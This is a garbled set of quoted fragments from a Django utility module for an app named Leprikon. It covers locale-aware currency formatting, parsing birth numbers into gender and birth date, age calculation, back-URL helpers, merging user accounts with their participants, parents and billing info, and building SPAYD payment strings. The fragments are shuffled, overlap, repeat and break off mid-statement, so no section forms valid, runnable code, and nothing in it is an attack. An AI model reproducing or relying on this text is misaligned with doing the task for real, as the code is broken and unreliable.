"default if nothing specified; # this should be the most fitting sign position",
"os import re import string import unicodedata import zlib from datetime import date",
"django.utils.encoding import iri_to_uri, smart_text from django.utils.functional import lazy from django.utils.safestring import mark_safe from",
"ObjectDoesNotExist from django.db import IntegrityError, transaction from django.urls import reverse_lazy as reverse from",
"this should be the most fitting sign position s = sign + s",
"if f.name not in exclude] for attr in attributes: if not getattr(target, attr):",
"return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text,",
"import unicodedata import zlib from datetime import date from urllib.parse import parse_qs, urlencode",
"MALE = \"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\" This function loads localeconv",
"* 100 + y if y > date.today().year % 100: year -= 100",
"+ s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if amount >",
"sign_pos = localeconv[val < 0 and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val <",
"for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp, tp,",
"= [] s = str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break",
"return request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter",
"\" \" or \"\") + s else: s = s + (separated and",
"or target.last_login ) try: leader = source.leprikon_leader leader.user = target leader.save() except ObjectDoesNotExist:",
".models.subjects import SubjectRegistration target = merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined = (",
"recursive back url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args,",
"sbi.user = target sbi.save() for mr in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient =",
"= str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:]) s =",
"def merge_users(source, target): from .models.subjects import SubjectRegistration target = merge_objects(source, target, (\"first_name\", \"last_name\",",
"try to reuse original back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass #",
"amount_color(amount): if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE",
"elif sign_pos == 4: s = s.replace(\">\", sign) else: # the default if",
"2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst) def",
"+ sign elif sign_pos == 3: s = s.replace(\"<\", sign) elif sign_pos ==",
"else: year = 1800 + y else: year = int(date.today().year / 100) *",
"# display fraction for non integer values if digits and not isinstance(val, int):",
"source._meta.fields if f.name not in exclude] for attr in attributes: if not getattr(target,",
"source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\"))",
"= attributes or [f.name for f in source._meta.fields if f.name not in exclude]",
"not in exclude] for attr in attributes: if not getattr(target, attr): setattr(target, attr,",
"if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target",
"the currency settings for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping groups =",
"return target @transaction.atomic def merge_users(source, target): from .models.subjects import SubjectRegistration target = merge_objects(source,",
"s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer values",
"\"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\" This function loads localeconv during module",
"unicodedata import zlib from datetime import date from urllib.parse import parse_qs, urlencode from",
"current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4] > \"50\" else MALE def get_birth_date(birth_num):",
"MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num) ==",
"most of the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\"",
"len(birth_num) == 9: # before 1954 if y < 54: year = 1900",
"20 day = int(birth_num[4:6]) return date(year, month, day) def get_age(birth_date, today=None): today =",
"separated = localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s =",
"\"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in",
"tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else:",
"= sign + s elif sign_pos == 2: s = s + sign",
"are leaders raise for attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\",",
"max(source.last_login, target.last_login) if source.last_login and target.last_login else source.last_login or target.last_login ) try: leader",
"grouping groups = [] s = str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not",
"1) if birth_day_this_year > today: return today.year - birth_date.year - 1 else: return",
"mark_safe from django.utils.translation import ugettext_lazy as _ from .conf import settings MALE =",
"iri_to_uri, smart_text from django.utils.functional import lazy from django.utils.safestring import mark_safe from django.utils.translation import",
"django.core.exceptions import ObjectDoesNotExist from django.db import IntegrityError, transaction from django.urls import reverse_lazy as",
"values if digits and not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] #",
"# remove recursive back url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def",
"lc localeconv = _get_localeconv() # This function is inspired by python's standard locale.currency().",
"+ \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are markers if the sign must be",
"# '<' and '>' are markers if the sign must be inserted between",
"\"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if",
"\"\") y = int(birth_num[:2]) if len(birth_num) == 9: # before 1954 if y",
"54: year = 1900 + y else: year = 1800 + y else:",
"= _get_localeconv() # This function is inspired by python's standard locale.currency(). def currency(val,",
"try: leader = source.leprikon_leader leader.user = target leader.save() except ObjectDoesNotExist: pass except IntegrityError:",
"inserted between symbol and value s = \"<\" + s + \">\" smb",
"else: # the default if nothing specified; # this should be the most",
"return s[0].upper() + s[1:] if s else \"\" def merge_objects(source, target, attributes=None, exclude=[]):",
"sign_pos == 4: s = s.replace(\">\", sign) else: # the default if nothing",
"locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv = _get_localeconv() # This function is inspired by",
"back url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs):",
"if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else:",
"groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer values if",
"lst)) if len(lst) > 2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return",
"in attributes: if not getattr(target, attr): setattr(target, attr, getattr(source, attr)) return target @transaction.atomic",
"\"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in source.leprikon_participants.all(): tp =",
"int(birth_num[2:4]) % 50 % 20 day = int(birth_num[4:6]) return date(year, month, day) def",
"social auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete()",
"= target sp.save() for sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp:",
"tp.save() else: sp.user = target sp.save() for sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first()",
"sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\",",
"implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc",
"locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv = _get_localeconv() # This function is inspired",
"\").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i % len(stringset)] for i in",
"break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) #",
"% zlib.crc32(s.encode()) return s.upper() def paragraph(text): return mark_safe(f\"<p>{text.strip()}</p>\".replace(\"\\n\", \"<br/>\\n\").replace(\"<br/>\\n<br/>\\n\", \"</p>\\n\\n<p>\")) lazy_paragraph = lazy(paragraph,",
"and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i % len(stringset)] for i",
"\"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else source.date_joined or",
"precedes: s = smb + (separated and \" \" or \"\") + s",
"position s = sign + s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def",
"= recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs),",
"should be the most fitting sign position s = sign + s return",
"sign_pos == 1: s = sign + s elif sign_pos == 2: s",
"IntegrityError, transaction from django.urls import reverse_lazy as reverse from django.utils.encoding import iri_to_uri, smart_text",
"This function is inspired by python's standard locale.currency(). def currency(val, international=False): \"\"\"Formats val",
"as _ from .conf import settings MALE = \"m\" FEMALE = \"f\" def",
"original_locale_name) return lc localeconv = _get_localeconv() # This function is inspired by python's",
"\"currency_symbol\"]) precedes = localeconv[val < 0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val",
"pass except IntegrityError: # both users are leaders raise for attr in (",
"the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name))",
"if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user = target",
"interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:]) s = s[:-interval] if s:",
"settings for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping groups = [] s",
"+= smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are markers if the sign",
"locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name)",
"return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def",
"except AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items): s",
"\", \"\\u00A0\") def amount_color(amount): if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount <",
"if len(birth_num) == 9: # before 1954 if y < 54: year =",
"0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val < 0 and \"n_sep_by_space\" or",
"or \"p_cs_precedes\"] separated = localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes:",
") recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1] except IndexError:",
"settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try:",
"locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv = _get_localeconv() #",
"in [ord(x) for x in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"])",
"It is necessary, because using locale.setlocale later may be dangerous (It is not",
"= int(birth_num[2:4]) % 50 % 20 day = int(birth_num[4:6]) return date(year, month, day)",
"not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try: # support social auth source.social_auth.update(user=target) except",
"tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target sbi.save()",
"exclude=[]): attributes = attributes or [f.name for f in source._meta.fields if f.name not",
"\"50\" else MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if",
"100: year -= 100 month = int(birth_num[2:4]) % 50 % 20 day =",
"import SubjectRegistration target = merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined = ( min(source.date_joined,",
"s[0].upper() + s[1:] if s else \"\" def merge_objects(source, target, attributes=None, exclude=[]): attributes",
"# support social auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source,",
"date.today() try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year = date(today.year, birth_date.month",
"in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def",
"today=None): today = today or date.today() try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except",
"= merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user = target sp.save() for sbi",
"< 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\")",
"request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ),",
"import re import string import unicodedata import zlib from datetime import date from",
"not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are",
"for i in [ord(x) for x in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return",
"sbi.save() for mr in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try:",
"before 1954 if y < 54: year = 1900 + y else: year",
"3: s = s.replace(\"<\", sign) elif sign_pos == 4: s = s.replace(\">\", sign)",
"sign = localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"] if sign_pos == 0:",
"(\"first_name\", \"last_name\", \"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else",
"most fitting sign position s = sign + s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\"",
"(separated and \" \" or \"\") + smb sign_pos = localeconv[val < 0",
"today.year - birth_date.year - 1 else: return today.year - birth_date.year def first_upper(s): return",
"= locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc",
"[f.name for f in source._meta.fields if f.name not in exclude] for attr in",
"if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK,",
"+ y else: year = 1800 + y else: year = int(date.today().year /",
"< 0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val < 0 and \"n_sep_by_space\"",
"if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try: # support social auth source.social_auth.update(user=target)",
"if birth_day_this_year > today: return today.year - birth_date.year - 1 else: return today.year",
"= \"(\" + s + \")\" elif sign_pos == 1: s = sign",
".rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items): s = \"SPD*1.0*\" + \"*\".join(",
") target.last_login = ( max(source.last_login, target.last_login) if source.last_login and target.last_login else source.last_login or",
"comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst) > 2: return _(\", and \").join([\",",
"RocketChat().merge_users(source, target) source.delete() def spayd(*items): s = \"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k,",
"merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user = target sp.save() for sp",
"source.leprikon_leader leader.user = target leader.save() except ObjectDoesNotExist: pass except IntegrityError: # both users",
"= locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL,",
") try: leader = source.leprikon_leader leader.user = target leader.save() except ObjectDoesNotExist: pass except",
"not s: break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s) groups.reverse() s =",
"currency(val, international=False): \"\"\"Formats val according to the currency settings for current language.\"\"\" digits",
"tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save()",
"\"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v",
"import date from urllib.parse import parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist from django.db",
"sp.user = target sp.save() for sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi:",
"recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1] except IndexError: pass",
"else: return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i %",
"\".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return",
"= ( max(source.last_login, target.last_login) if source.last_login and target.last_login else source.last_login or target.last_login )",
"birth_date.year - 1 else: return today.year - birth_date.year def first_upper(s): return s[0].upper() +",
"= url_back.split(\"?\")[1] except IndexError: pass else: try: # try to reuse original back",
"url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return",
"\"p_cs_precedes\"] separated = localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s",
"( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for",
"import mark_safe from django.utils.translation import ugettext_lazy as _ from .conf import settings MALE",
"or \"p_sign_posn\"] sign = localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"] if sign_pos",
"except ValueError: birth_day_this_year = date(today.year, birth_date.month + 1, 1) if birth_day_this_year > today:",
"AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items): s =",
"is not thread-safe in most of the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name",
"_(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters",
"ugettext_lazy as _ from .conf import settings MALE = \"m\" FEMALE = \"f\"",
"= date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year = date(today.year, birth_date.month + 1, 1)",
"date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year = date(today.year, birth_date.month + 1, 1) if",
"(k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in sorted(items) ) s +=",
"for sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp = merge_objects(sp,",
"ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst)",
"import ObjectDoesNotExist from django.db import IntegrityError, transaction from django.urls import reverse_lazy as reverse",
"target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user =",
"birth_day_this_year > today: return today.year - birth_date.year - 1 else: return today.year -",
"= 1900 + y else: year = 1800 + y else: year =",
"_ from .conf import settings MALE = \"m\" FEMALE = \"f\" def _get_localeconv():",
"s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def paragraph(text): return mark_safe(f\"<p>{text.strip()}</p>\".replace(\"\\n\", \"<br/>\\n\").replace(\"<br/>\\n<br/>\\n\", \"</p>\\n\\n<p>\"))",
"reverse_lazy as reverse from django.utils.encoding import iri_to_uri, smart_text from django.utils.functional import lazy from",
"smb = smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val < 0 and",
"s = \"<\" + s + \">\" smb = smart_text(localeconv[international and \"int_curr_symbol\" or",
"\"p_sign_posn\"] sign = localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"] if sign_pos ==",
"are markers if the sign must be inserted between symbol and value s",
"= \"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k,",
"def currency(val, international=False): \"\"\"Formats val according to the currency settings for current language.\"\"\"",
"day = int(birth_num[4:6]) return date(year, month, day) def get_age(birth_date, today=None): today = today",
"in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\",",
"and not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>'",
"tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user = target sp.save()",
"if the sign must be inserted between symbol and value s = \"<\"",
"display fraction for non integer values if digits and not isinstance(val, int): s",
"year -= 100 month = int(birth_num[2:4]) % 50 % 20 day = int(birth_num[4:6])",
"0 and \"negative_sign\" or \"positive_sign\"] if sign_pos == 0: s = \"(\" +",
"source.date_joined and target.date_joined else source.date_joined or target.date_joined ) target.last_login = ( max(source.last_login, target.last_login)",
"( max(source.last_login, target.last_login) if source.last_login and target.last_login else source.last_login or target.last_login ) try:",
"source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\"))",
"exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user = target sp.save() for sp in source.leprikon_parents.all():",
"lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv = _get_localeconv() # This function",
"+ (separated and \" \" or \"\") + s else: s = s",
"year = 1900 + y else: year = 1800 + y else: year",
"or \"p_sep_by_space\"] if precedes: s = smb + (separated and \" \" or",
"0: s = \"(\" + s + \")\" elif sign_pos == 1: s",
"s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are markers if the",
"s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if amount > 0:",
"\"\".join([stringset[i % len(stringset)] for i in [ord(x) for x in os.urandom(length)]]) def current_url(request):",
"= list(map(smart_text, lst)) if len(lst) > 2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]])",
"support social auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source, target)",
"if birth_num[2:4] > \"50\" else MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y",
"list(map(smart_text, lst)) if len(lst) > 2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else:",
"in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try: # support social",
"\" or \"\") + s else: s = s + (separated and \"",
"else source.last_login or target.last_login ) try: leader = source.leprikon_leader leader.user = target leader.save()",
"locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv",
"localeconv[val < 0 and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val < 0 and",
"def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i % len(stringset)] for i in [ord(x)",
"groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer values if digits",
"0 and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val < 0 and \"negative_sign\" or",
"re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1] except IndexError: pass else: try:",
"s = \"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for",
"locale.setlocale later may be dangerous (It is not thread-safe in most of the",
"according to the currency settings for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping",
"min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else source.date_joined or target.date_joined ) target.last_login =",
"sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp = merge_objects(sp, tp,",
"for sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi,",
"as reverse from django.utils.encoding import iri_to_uri, smart_text from django.utils.functional import lazy from django.utils.safestring",
"source.delete() def spayd(*items): s = \"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\",",
"% 100: year -= 100 month = int(birth_num[2:4]) % 50 % 20 day",
"This function loads localeconv during module load. It is necessary, because using locale.setlocale",
"i in [ord(x) for x in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path,",
"*args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4] >",
"/ 100) * 100 + y if y > date.today().year % 100: year",
"request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get(",
"date(year, month, day) def get_age(birth_date, today=None): today = today or date.today() try: birth_day_this_year",
"sign_pos == 2: s = s + sign elif sign_pos == 3: s",
"settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst",
"**kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4] > \"50\"",
"> \"50\" else MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2])",
"(It is not thread-safe in most of the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL)",
"9: # before 1954 if y < 54: year = 1900 + y",
"from datetime import date from urllib.parse import parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist",
"import iri_to_uri, smart_text from django.utils.functional import lazy from django.utils.safestring import mark_safe from django.utils.translation",
"attributes = attributes or [f.name for f in source._meta.fields if f.name not in",
"in source._meta.fields if f.name not in exclude] for attr in attributes: if not",
"import parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist from django.db import IntegrityError, transaction from",
"1900 + y else: year = 1800 + y else: year = int(date.today().year",
"= int(date.today().year / 100) * 100 + y if y > date.today().year %",
"last_name=sp.last_name).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user =",
"f in source._meta.fields if f.name not in exclude] for attr in attributes: if",
"nothing specified; # this should be the most fitting sign position s =",
